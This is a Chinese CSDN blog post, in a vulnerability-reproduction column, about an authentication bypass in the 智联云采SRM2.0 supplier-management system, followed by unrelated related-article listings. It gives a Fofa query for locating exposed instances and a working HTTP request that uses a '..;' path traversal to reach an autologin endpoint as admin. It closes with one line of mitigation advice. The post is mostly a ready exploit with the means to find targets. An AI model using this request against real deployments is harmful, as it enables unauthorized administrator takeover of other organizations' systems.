智联云采SRM2.0 身份认证绕过

最新推荐文章于 2024-09-03 22:28:24 发布
最新推荐文章于 2024-09-03 22:28:24 发布
阅读量86 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141860513
版权

0x01 漏洞描述:

智联云采SRM2.0存在身份认证绕过漏洞,导致未授权的攻击者可以构造特殊绕过身份认证直接以管理员身份接管后台。

0x02 搜索语句:

Fofa:title=="SRM 2.0"

0x03 漏洞复现:

GET /adpweb/static/..;/api/sys/app/autologin?loginName=admin HTTP/1.1
Host: your-ip
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="101"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36

 直接访问

http://your-ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

 

0x04 修复建议:

关闭外网访问权限 限制问题接口权限访问

iSee857
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
基于scrapy框架的智联招聘爬虫
06-27
【基于Scrapy框架的智联招聘爬虫】 在IT领域,网络爬虫是获取大量数据的重要工具,尤其在数据分析和信息挖掘中起着至关重要的作用。本项目关注的是使用Python的Scrapy框架来构建一个针对智联招聘网站的爬虫。Scrapy...
智联天地N1刷机程序
04-28
智联天地N1刷机程序】是一款专为圆通PDA N1设备设计的固件更新工具。在深入理解这个知识点之前,首先要明白刷机的概念。刷机是指通过安装第三方系统或者官方更新来替换手机或设备原有的操作系统,通常是为了获取更...
抓取智联招聘.mp4
02-20
抓取智联招聘.mp4
智联天地PDA开发包
01-07
智联天地PDA开发包】是专门为智联天地N2(1D.2D)型号的PDA设备设计的一款开发工具,它包含了用于构建基于该设备的应用程序所需的SDK(软件开发工具包)。SDK通常是一组工具、库、文档和示例代码,帮助开发者能够...
智联招聘2017 面试题.pdf
03-21
### 智联招聘2017面试题分析 #### 第1题:处理嘈杂环境下的面试电话 - **知识点**:本题考察面试者在突发情况下的应对能力及专业素养。 - **解析**:面试电话往往需要一个相对安静的环境来确保双方沟通的有效性。...
光盘安全隔离与信息单向导入系统-信刻
cdprinter的博客
08-30 102
为更多用户提供安全可靠的跨网数据单向导入/导出光盘摆渡系统解决方案,解决内外网数据交换的问题,确保数据交换过程的安全性。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 641
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞。
海外直播对网速、带宽、安全的要求
TIANGEKUAJING的博客
09-03 158
要满足海外直播的要求,需要拥有合适的网络配置。在全球化的浪潮下,海外直播正逐渐成为企业、个人和各类组织的重要工具。不论是用于市场推广、品牌宣传,还是与观众互动,海外直播都为参与者带来了丰富的机会。然而,确保高质量的直播效果,必须满足特定的网络条件。
【软件逆向】第27课,软件逆向安全工程师之(二)寄存器寻址,每天5分钟学习逆向吧!
DvlpNews
09-02 471
寄存器寻址是汇编语言中的一种寻址方式,在这种方式中,操作数位于CPU的寄存器中。寄存器是CPU内部的高速存储位置,用于快速访问数据。
注册安全分析报告:央视网
Explinks的博客
09-03 403
央视网作为中央广播电视总台主办的中央重点新闻网站和国家级互联网视频综合传播服务平台, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。
高端控制台使用过程中如何保证用电安全
JiaDeLi_console的博客
09-03 294
因此,在使用过程中,采取有效措施确保用电安全,不仅关乎设备寿命,更直接关系到人身安全及数据安全。同时,增强员工的安全意识,让每个人都成为用电安全的守护者,共同营造一个安全、稳定的工作环境。在高端控制台的使用过程中,可以引入智能监控系统,实时监测电力参数、环境温度等关键指标,一旦发现异常立即报警,为及时处理问题提供有力支持。总之,高端控制台使用过程中的用电安全是一项系统工程,需要从电源布局、设备选型、日常维护、人员培训以及智能监控等多个方面入手,全方位、多角度地确保用电安全,为设备的稳定运行保驾护航。
在线式环氧乙烷检测仪:现代工业生产中的环氧乙烷安全监测
iotsensor的博客
09-03 370
通过精确、可靠的监测,这些设备能够及时发现并预警环氧乙烷的泄漏风险,有效避免火灾、爆炸等安全事故的发生,从而保障生产环境的安全与员工的健康。:ETO-B1电化学传感器具有灵敏度高,选择性好,可以过滤灰尘和小水滴,低浓度输出线性好,稳定性好,7系大小,抗H2、NH3、CO2、CL2的干扰等优点,量程为0~100ppm,工作环境为-30~50℃,15~90%RH,分辨率为0.1ppm,主要用在石油,化工,检测工业环境中的VOC气体。因此,对于环氧乙烷的安全管理,必须采取严格的监测措施。
AWS EC2安全组配置:轻松开放端口访问
九河云的创作之路
09-03 351
选择要开放的协议类型(如TCP、UDP等),输入端口号,然后在来源处选择允许访问的IP范围。通过以上步骤,您可以轻松管理EC2实例的端口访问,既保证了服务的可用性。记住,定期检查和更新安全组配置是保持EC2实例安全的关键。点击左侧导航栏中的"安全组",找到对应实例的安全组。选择该安全组,点击"编辑入站规则"。在AWS EC2实例上开放特定端口是配置服务器安全性和可访问性的重要步骤。在EC2控制面板中,找到需要开放端口的实例,并记下其安全组ID。添加完所需的规则后,点击"保存规则"以应用更改。
分享 | 某省级城商行用零信任破解远程访问安全风险
trusfort的博客
09-03 307
L行的此次改造一箭三雕,切实提升了企业的身份安全、远程访问安全、数据安全水平,为企业的零信任建设树立了标杆。统一门户与安全接入系统投入使用后,L行有效提升身份安全、远程访问安全、数据安全水平,利用零信任强化了安全防护体系,既提升了网络安全能力,保障了数字化业务安全稳定运行,也为员工提供了更好的体验,提升了办公、运维效率。向上对接权威身份源,向下对接各个业务应用,接管应用的身份管理功能,为所有应用提供统一的员工身份和组织架构信息,进而实现对业务应用身份认证、访问权限、审计日志的统一管理。
第140天:内网安全-横向移动&局域网&ARP欺骗&DNS劫持钓鱼&中间人单双向
最新发布
weixin_71529930的博客
09-03 332
dns会优先从本地缓存>host文件>本地dns服务器>根域dns服务器>顶级dns服务器>权威dns服务器。这个实验的原理应该就是告诉dns我时被控主机,告诉被控主机我是dns,开启转发的话,还能正常访问,关闭的话就不行了。原理:一台主机不停的向另一台主机发送数据包,并告诉他我是网关,我的ip是网关ip,mac地址却不对应,导致被攻击主机找不到网关,就没有网络。双向原理: 就是告诉网关,我是被控制的主机,告诉被控制主机,我是网关,如果开启转发的话,那么流量都会通过攻击主机。
密钥分发与公钥认证:保障网络通信的安全
2301_80064376的博客
08-27 2130
密钥分发与公钥认证是保障网络通信安全的基石。通过对称密钥分发中心(KDC)和公钥认证中心(CA),可以有效解决密钥分发和公钥认证的问题,确保通信双方的身份真实性和数据传输的机密性。图文来源:《计算机网络教程》第六版微课版‍。
解锁.NET安全奥秘:敏感数据加密与哈希的深度揭秘
qq_43535970的博客
08-30 816
在这篇博客中,我们深入探讨了如何在 .NET 应用程序中使用加密与哈希技术来保护敏感数据。文章从基础概念出发,详细介绍了对称加密与非对称加密的区别,如何安全地存储密码,以及使用 AES 进行数据加密与解密的具体实现。同时,文章还分享了密钥管理、安全通信等最佳实践,帮助开发者最大程度地保障数据安全。通过这篇指南,您将能够更好地理解并应用这些关键技术,为您的 .NET 应用构建坚实的安全基础。
医院安全用电全套解决方案
Acrel_WPP的博客
09-03 340
针对医院的难点,我们采用安全用电监测预警系统通过物联网技术对电气引发火灾的主要因素(导线温度、电流、电压和漏电流)进行不间断的数据跟踪与统计分析,实时发现电气线路和用电设备存在的安全隐患(如:线缆温度异常、短路、过载、过压、欠压及漏电等),有效防止电气火灾的发生。通过引入智能化的安全用电管理系统,医院可以实现对电气设备的远程监控、故障预警和数据分析等功能,提高管理效率,降低运营成本。采用符合要求的安全用电产品,可以确保医院电气系统满足法规和标准的要求,避免因违规操作而引发的安全问题。
IP地址安全与隐私保护
m0_73740397的博客
09-03 296
在当今数字化时代,IP地址作为网络设备的唯一身份标识,在网络安全与隐私保护中扮演着至关重要的角色。然而,随着网络技术的飞速发展,IP地址也面临着诸多挑战,对用户的隐私和网络安全构成了潜在威胁。基于IP的访问控制,结合白名单与黑名单机制,我们能够严格管理网络访问权限,只允许经过验证的、可信的IP地址访问关键资源,面对日益复杂的网络威胁与挑战,我们需。通过对IP地址行为的检测,我们可以限制未授权IP访问,减少数据泄露的风险。向他人泄露自己的个人信息,对重要数据要进行加密,降低风险的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值